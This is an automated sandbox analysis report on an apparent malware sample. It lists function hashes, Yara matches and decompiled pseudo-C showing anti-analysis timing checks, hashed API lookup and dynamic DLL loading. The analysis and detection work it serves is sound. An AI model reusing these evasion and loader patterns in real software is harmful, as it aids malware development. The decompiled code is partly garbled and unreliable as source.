Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1e8f9e34e7256a9a974f3cddaf0f3ebbf235d585145650c4dda65b06d2cc7b00
Instruction ID: 7b611f7d2db9be6b796d577088613073eb51052201da35903ce31f64545808ae
Opcode Fuzzy Hash: 1e8f9e34e7256a9a974f3cddaf0f3ebbf235d585145650c4dda65b06d2cc7b00
Instruction Fuzzy Hash: 4B9002B120100802D2407159440475610069BD0341F52C021A6055555F86998DD5B6A5

Uniqueness

Uniqueness Score: -1.00%

Function 00FE9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00FE9A5A

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 869d5e6d09cd8a5b408c42e5df911b350a08f1b9c7913d025a83192ed36242ba
Instruction ID: 9c44c9066dc5755a967dddd771e37cdab22114344506291eca3a738d0691b94b
Opcode Fuzzy Hash: 869d5e6d09cd8a5b408c42e5df911b350a08f1b9c7913d025a83192ed36242ba
Instruction Fuzzy Hash: 1990026121180442D30065694C14B1710069BD0343F52C125A1145555DC9558861B561

Uniqueness

Uniqueness Score: -1.00%

Function 00FE9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00FE9A2A

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 78dc3d6e53dfd09d18f0d351c3e50b0e1df2cf7a5f4ba5c50c851e6bdb36225a
Instruction ID: 51ee488a3e20044e3fa6ddcc2a087237d3d02dbfcc1035311a8e34ff663592d5
Opcode Fuzzy Hash: 78dc3d6e53dfd09d18f0d351c3e50b0e1df2cf7a5f4ba5c50c851e6bdb36225a
Instruction Fuzzy Hash: 36900261601004424240716988449165006BFE1351752C131A1989551E85998865B6A5

Uniqueness

Uniqueness Score: -1.00%

Function 00FE9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00FE9A0A

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f868270fd422e5fa2ad32053628b44a92dac86e885c2cfde5cb8305350acea7b
Instruction ID: 26dd0ea29e7b78e4bd277c39c79de5c2b9ff6581b8807e68f0f1dfc835ce02c2
Opcode Fuzzy Hash: f868270fd422e5fa2ad32053628b44a92dac86e885c2cfde5cb8305350acea7b
Instruction Fuzzy Hash: A190027120140802D2006159481471B10069BD0342F52C021A2155556E86658851B5B1

Uniqueness

Uniqueness Score: -1.00%

Function 00FE95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00FE95DA

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 783ec9b52578cffa0e388dc044eb4073357bba82f5325862019c3789f9cea9dc
Instruction ID: d301415a7278175c444edfd67515c8a516b55754e09b31bbc965b00936c4f65a
Opcode Fuzzy Hash: 783ec9b52578cffa0e388dc044eb4073357bba82f5325862019c3789f9cea9dc
Instruction Fuzzy Hash: 129002A120200403420571594414626500B9BE0341B52C031E2005591EC5658891B165

Uniqueness

Uniqueness Score: -1.00%

Function 00FE9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00FE954A

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 226f90f8aefedb5a0cae8c24f24c403566f5af5d5b0342ee4acfec0b5f23fb35
Instruction ID: 69162ed29e56e68af7b2978969ee0204f9d764519973f2f8ea5eedbe19cc768b
Opcode Fuzzy Hash: 226f90f8aefedb5a0cae8c24f24c403566f5af5d5b0342ee4acfec0b5f23fb35
Instruction Fuzzy Hash: 72900265211004030205A559070451710479BD5391352C031F2006551DD6618861B161

Uniqueness

Uniqueness Score: -1.00%

Function 00FE96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00FE96EA

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8dd3192fce5394c09b44779953a602328edc70c990b717f215e4932cca1f73ff
Instruction ID: c58cb0ec6eb548e2473b038ea265bd80684ee20eb5de19b67b3e630d8de64cc4
Opcode Fuzzy Hash: 8dd3192fce5394c09b44779953a602328edc70c990b717f215e4932cca1f73ff
Instruction Fuzzy Hash: 3590027120108C02D2106159840475A10069BD0341F56C421A5415659E86D58891B161

Uniqueness

Uniqueness Score: -1.00%

Function 00FE9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00FE966A

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 11f0bf54a6029bc631af4d460e26a135bda53ad9e4211d8e8688064be5d502a9
Instruction ID: f662abfc5e1220b3c0917192af0d623bbfe401405b8021a2b4bf2bca61f27f6c
Opcode Fuzzy Hash: 11f0bf54a6029bc631af4d460e26a135bda53ad9e4211d8e8688064be5d502a9
Instruction Fuzzy Hash: 9090027120100C02D2807159440465A10069BD1341F92C025A1016655ECA558A59B7E1

Uniqueness

Uniqueness Score: -1.00%

Function 00FE9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00FE9FEA

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d72a47be40b7aaf149c044fd95bc5e4c174f4e8df4b4948f1333c2827b5733b6
Instruction ID: b7637a93b9a1a1451a80c9c8bf8054f0f05f3389d4e7cde5ceeb83d929595390
Opcode Fuzzy Hash: d72a47be40b7aaf149c044fd95bc5e4c174f4e8df4b4948f1333c2827b5733b6
Instruction Fuzzy Hash: B590027131114802D2106159840471610069BD1341F52C421A1815559E86D58891B162

Uniqueness

Uniqueness Score: -1.00%

Function 00FE97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00FE97AA

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 94e0e0ede5ac6ffb0405bc8343093019de9562c0f6ce0fc2e53a18c307eb478d
Instruction ID: 8c86e518a7ddb8b5db8fb5d7a0efe172cde5176f73e413ffa383af29e32a87e3
Opcode Fuzzy Hash: 94e0e0ede5ac6ffb0405bc8343093019de9562c0f6ce0fc2e53a18c307eb478d
Instruction Fuzzy Hash: FE90026130100403D240715954186165006EBE1341F52D021E1405555DD9558856B262

Uniqueness

Uniqueness Score: -1.00%

Function 00FE9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00FE978A

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 69855f26aee09ee303036d71ea4faa3890ceea257369e58085e530091ad9d1e4
Instruction ID: 31ea367c690b668709b195a88787ee15fab9a41c433464e7d60a5ec52fea3918
Opcode Fuzzy Hash: 69855f26aee09ee303036d71ea4faa3890ceea257369e58085e530091ad9d1e4
Instruction Fuzzy Hash: E390026921300402D2807159540861A10069BD1342F92D425A1006559DC9558869B361

Uniqueness

Uniqueness Score: -1.00%

Function 00FE9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00FE971A

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9f9da8027f0b853cd37062ca905926b4c8087327664200e69209f191f7d65c1b
Instruction ID: 8e5b64fa19e6e17a6ba4d9724058b9e344b7d3caafb093bc1fde321bf00b7163
Opcode Fuzzy Hash: 9f9da8027f0b853cd37062ca905926b4c8087327664200e69209f191f7d65c1b
Instruction Fuzzy Hash: E890027120100802D2006599540865610069BE0341F52D021A6015556FC6A58891B171

Uniqueness

Uniqueness Score: -1.00%

Function 004088A0, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E004088A0(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E00(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407010( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E00419CC0( &_v284, 0x104);
						E0041A330( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413DC0(E00413D60(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1b5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407040( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070C0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x004088ab
0x004088b3
0x004088b5
0x004088ba
0x004088bf
0x004088d2
0x004088d7
0x004088e0
0x004088ec
0x004088ff
0x00408904
0x00408907
0x00408910
0x00408922
0x00408927
0x0040892c
0x00000000
0x00000000
0x0040892e
0x00408932
0x00000000
0x00000000
0x00408934
0x00000000
0x00408932
0x00408936
0x00408939
0x0040893f
0x00408941
0x0040894c
0x00408951
0x00408954
0x00408961
0x0040896c
0x0040896e
0x00408974
0x00408978
0x0040897b
0x0040897b
0x00408982
0x00408985
0x0040898a
0x00408997
0x004088c6
0x004088c6
0x004088c6

Memory Dump Source

Source File: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
Instruction ID: 5568bf364e599ab98db8d6cec98c55b42aa716c8f34da205b899e6f8c2a7a87e
Opcode Fuzzy Hash: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
Instruction Fuzzy Hash: EF213CB2C4420857CB20E6649D42BFF73BC9B50304F44057FE989A3181F638BB498BA6

Uniqueness

Uniqueness Score: -1.00%

Function 00409B8B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 91
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00409B8B(void* __eax, void* __edi, void* __eflags, short* _a4, void* _a8) {
				intOrPtr _v4;
				struct _EXCEPTION_RECORD _v8;
				struct _OBJDIR_INFORMATION _v12;
				char _v16;
				void* __ebx;
				short* __esi;
				void* __ebp;
				struct _OBJDIR_INFORMATION _t35;

				asm("out dx, al");
				if(__eflags > 0) {
					_t35 = E004192F0(_v4);
					_v12 = _t35;
					if(_t35 == 0) {
						LdrLoadDll(0, 0,  &_v8,  &_v12); // executed
						_t35 = _v12;
					}
					return _t35;
				} else {
					__eflags =  *(__edi + 0x55) & __ah;
					_push(__ebp);
					__ebp = __esp;
					__esp = __esp - 0xc;
					_push(__esi);
					__esi = _a4;
					__eax =  *(__esi + 4);
					_push(__edi);
					__eax = E00419F80( *(__esi + 4));
					__edi =  *(__esi + 4);
					__ecx = 0;
					_v8 = __cx;
					__ecx = __eax + __eax;
					_t17 = __edi - 2; // -2
					__edx = __ecx + _t17;
					_v16 = 0x64002e;
					_v12 = 0x6c006c;
					__eflags =  *__edx - 0x20;
					if( *__edx == 0x20) {
						__eflags = __eax;
						if(__eax != 0) {
							while(1) {
								__eflags =  *__edx - 0x20;
								if( *__edx != 0x20) {
									goto L9;
								}
								__edx = __edx - 2;
								__eax = __eax - 1;
								__eflags = __eax;
								if(__eax != 0) {
									continue;
								}
								goto L9;
							}
						}
						L9:
						__ecx = __eax + __eax;
						__edx = 0;
						__eflags = 0;
						 *((short*)(__ecx + __edi)) = __dx;
					}
					_t24 =  *(__esi + 4) - 2; // -2
					__eax = __ecx + _t24;
					__bl = 0;
					__eflags = __eax -  *(__esi + 4);
					if(__eax <  *(__esi + 4)) {
						L18:
						__edx =  *(__esi + 4);
						__ecx =  &_v16;
						__eax = E00419F80( *(__esi + 4));
						__ecx =  *(__esi + 4);
						__edx =  *(__esi + 4) + __eax * 2;
						__eax =  *(__esi + 4);
						__eax = E00419F80( *(__esi + 4));
						__eax = __eax + __eax;
						__eflags = __eax;
						 *__esi = __ax;
					} else {
						do {
							__ecx =  *__eax & 0x0000ffff;
							__eax = __eax - 2;
							__eflags = __ecx - 0x2e;
							if(__ecx != 0x2e) {
								__eflags = __ecx - 0x5c;
								if(__ecx == 0x5c) {
									 *(__esi + 4) = __eax;
									__eax = E00419F80(__eax);
									__eax = __eax + __eax;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									goto L14;
								}
							} else {
								__bl = 1;
								goto L14;
							}
							L17:
							__eflags = __bl;
							if(__bl == 0) {
								goto L18;
							}
							goto L19;
							L14:
							__eflags = __eax -  *(__esi + 4);
						} while (__eax >=  *(__esi + 4));
						goto L17;
					}
					L19:
					_pop(__edi);
					_pop(__esi);
					__esp = __ebp;
					_pop(__ebp);
					return __eax;
				}
			}

0x00409b8b
0x00409b8c
0x00409b61
0x00409b69
0x00409b6e
0x00409b82
0x00409b84
0x00409b84
0x00409b8a
0x00409b8e
0x00409b8e
0x00409b90
0x00409b91
0x00409b93
0x00409b97
0x00409b98
0x00409b9b
0x00409b9e
0x00409ba0
0x00409ba5
0x00409ba8
0x00409baa
0x00409bae
0x00409bb1
0x00409bb1
0x00409bb8
0x00409bbf
0x00409bc6
0x00409bca
0x00409bcc
0x00409bce
0x00409bd0
0x00409bd0
0x00409bd4
0x00000000
0x00000000
0x00409bd6
0x00409bd9
0x00409bd9
0x00409bda
0x00000000
0x00000000
0x00000000
0x00409bda
0x00409bd0
0x00409bdc
0x00409bdc
0x00409bdf
0x00409bdf
0x00409be1
0x00409be1
0x00409be8
0x00409be8
0x00409bec
0x00409bee
0x00409bf1
0x00409c26
0x00409c26
0x00409c2b
0x00409c30
0x00409c35
0x00409c38
0x00409c44
0x00409c48
0x00409c50
0x00409c50
0x00409c52
0x00409bf3
0x00409bf3
0x00409bf3
0x00409bf6
0x00409bf9
0x00409bfc
0x00409c02
0x00409c05
0x00409c12
0x00409c15
0x00409c1d
0x00409c1d
0x00409c1f
0x00000000
0x00000000
0x00000000
0x00409bfe
0x00409bfe
0x00000000
0x00409bfe
0x00409c22
0x00409c22
0x00409c24
0x00000000
0x00000000
0x00000000
0x00409c07
0x00409c07
0x00409c07
0x00000000
0x00409c0c
0x00409c55
0x00409c55
0x00409c56
0x00409c58
0x00409c5a
0x00409c5b
0x00409c5b

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B82

Strings

., xrefs: 00409BB8
l, xrefs: 00409BBF

Memory Dump Source

Source File: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID: .$l
API String ID: 2234796835-2021555757
Opcode ID: 32965ad29e38ca1bc418e75a6ae1594c1bf6cbb67cf007c2d5be520512471bc6
Instruction ID: 36189e059e58b772d15cd0009f2daba7a18fa91946e1b3a57703a8de7098fae7
Opcode Fuzzy Hash: 32965ad29e38ca1bc418e75a6ae1594c1bf6cbb67cf007c2d5be520512471bc6
Instruction Fuzzy Hash: 33310575A00205ABDB20EF64D981AABB3F4FF54308F1484AEE849DB282E634FD45C785

Uniqueness

Uniqueness Score: -1.00%

Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00407260(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E00419D10( &_v67, 0, 0x3f);
				E0041A8F0( &_v68, 3);
				_t12 = E00409B10(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409270(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x00407260
0x0040726f
0x00407273
0x0040727e
0x0040728e
0x0040729e
0x004072a3
0x004072aa
0x004072ad
0x004072ba
0x004072bc
0x004072be
0x004072db
0x004072db
0x00000000
0x004072dd
0x004072e2

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA

Memory Dump Source

Source File: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
Instruction ID: ed9c0dd32f68776d22a62b6ccf8dda9c2c93357863a303a75fe51d199eec68b3
Opcode Fuzzy Hash: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
Instruction Fuzzy Hash: DE018431A8032876E720A6959C03FFE776C5B40B55F15416EFF04BA1C2E6A87D0646EA

Uniqueness

Uniqueness Score: -1.00%

Function 004184B5, Relevance: 1.5, APIs: 1, Instructions: 30
memoryCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E004184B5(void* __eax, intOrPtr _a8, void* _a12, long _a16, void* _a20) {
				char _t13;
				void* _t18;
				void* _t19;

				asm("loope 0x42");
				_pop(ss);
				asm("fcom dword [ebp-0x75]");
				_t3 = _a8 + 0xc74; // 0xc74
				E00418DB0(_t18, _a8, _t3,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x35, _t19);
				_t13 = RtlFreeHeap(_a12, _a16, _a20); // executed
				return _t13;
			}

0x004184b7
0x004184be
0x004184bf
0x004184cf
0x004184d7
0x004184ed
0x004184f1

APIs

RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED

Memory Dump Source

Source File: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 46d2197f411df67c830cb7e13a500491401c226980b51bb83b569ea791f92d71
Instruction ID: 23066d5570df1d8eb06afcff80dd031025e34534c7bced57141ac60520ee7242
Opcode Fuzzy Hash: 46d2197f411df67c830cb7e13a500491401c226980b51bb83b569ea791f92d71
Instruction Fuzzy Hash: D2F03075201204AFCB24DFAADC85EEB7B68EF88360F114149F90D97741DB31E915CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00418612, Relevance: 1.5, APIs: 1, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00418612(signed int __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, WCHAR* _a4, WCHAR* _a8, struct _LUID* _a12) {
				intOrPtr _v0;
				int _t19;

				 *(__edi + __eax * 2) =  *(__edi + __eax * 2) | __eax;
				 *((intOrPtr*)(__esi + 0x415dc345)) =  *((intOrPtr*)(__esi + 0x415dc345)) - __edx;
				asm("lodsd");
				_push(ds);
				E00418DB0(__edi, _v0, _v0 + 0xc8c,  *((intOrPtr*)(_v0 + 0xa18)), 0, 0x46, __esi);
				_t19 = LookupPrivilegeValueW(_a4, _a8, _a12); // executed
				return _t19;
			}

0x00418613
0x00418616
0x0041861c
0x0041861e
0x0041863a
0x00418650
0x00418654

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650

Memory Dump Source

Source File: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: b2c4ff881355feb02d5dd073f88be21d6b29b0fd63fd1e2a06e66d1c79b0e011
Instruction ID: 3f7c8b7bcbb9a8ccad6733f4aa8d1ba2ac7e35e9b869920f5b79c854569a194d
Opcode Fuzzy Hash: b2c4ff881355feb02d5dd073f88be21d6b29b0fd63fd1e2a06e66d1c79b0e011
Instruction Fuzzy Hash: 64F0A0B12003147FDB24DF59CC45EEB3BA9EF89210F008259FA095B242CA31A91087E1

Uniqueness

Uniqueness Score: -1.00%

Function 004184C0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED

Memory Dump Source

Source File: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: bd69bb0d8e56be58ea846d441575552e1355d89f45fa104c15060bc9e05e818a
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: EDE01AB12002046BDB14DF59DC45EE777ACAF88750F014559BA0857241CA30E9108AF4

Uniqueness

Uniqueness Score: -1.00%

Function 00418480, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD

Memory Dump Source

Source File: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 95874ba5a5537b3d16e5bdcad340c4ef7a657c48911e570d945e23b5f838c0ed
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 7BE012B1200208ABDB14EF99DC41EE777ACAF88654F118559BA085B282CA30F9108AF4

Uniqueness

Uniqueness Score: -1.00%

Function 00418620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650

Memory Dump Source

Source File: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 1821f594b7a2fedb3326d3670d224aab122327744fc2f581a2e4424e2d02315d
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 2AE01AB12002086BDB10DF49DC85EE737ADAF89650F018159BA0857241C934E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00418500, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418500(intOrPtr _a4, int _a8) {
				void* _t10;
				void* _t11;

				E00418DB0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_a4 + 0xa14)), 0, 0x36, _t11);
				ExitProcess(_a8);
			}

0x0041851a
0x00418528

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528

Memory Dump Source

Source File: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 9f62bdc44f65d7d9a2483e28fb075f3ff631dd5cfbab79109080827007e6cc43
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 62D012716003147BD620DF99DC85FD7779CDF49750F018069BA1C5B241C931BA0086E5

Uniqueness

Uniqueness Score: -1.00%

Function 00FE967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00FE9694

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d69a568bd3c01bd6b1b8741695a98502ac883f7ddb1346542a67ed32ce26cf6c
Instruction ID: 1dc07bb8ff6b6698401254127e0ab06c4744a782e5ceb09ce967f87617a1cb2b
Opcode Fuzzy Hash: d69a568bd3c01bd6b1b8741695a98502ac883f7ddb1346542a67ed32ce26cf6c
Instruction Fuzzy Hash: 2BB09B71D054C5C5D711D761460872779017BD0751F17C062D2020641B4778C4D1F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0105B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

*** then kb to get the faulting stack, xrefs: 0105B51C
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0105B38F
*** An Access Violation occurred in %ws:%s, xrefs: 0105B48F
*** enter .exr %p for the exception record, xrefs: 0105B4F1
The instruction at %p referenced memory at %p., xrefs: 0105B432
read from, xrefs: 0105B4AD, 0105B4B2
*** enter .cxr %p for the context, xrefs: 0105B50D
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0105B323
an invalid address, %p, xrefs: 0105B4CF
<unknown>, xrefs: 0105B27E, 0105B2D1, 0105B350, 0105B399, 0105B417, 0105B48E
*** A stack buffer overrun occurred in %ws:%s, xrefs: 0105B2F3
The resource is owned shared by %d threads, xrefs: 0105B37E
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0105B305
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 0105B39B
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0105B314
This failed because of error %Ix., xrefs: 0105B446
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0105B2DC
*** Inpage error in %ws:%s, xrefs: 0105B418
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0105B53F
*** Resource timeout (%p) in %ws:%s, xrefs: 0105B352
Go determine why that thread has not released the critical section., xrefs: 0105B3C5
The critical section is owned by thread %p., xrefs: 0105B3B9
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0105B484
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0105B47D
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0105B476
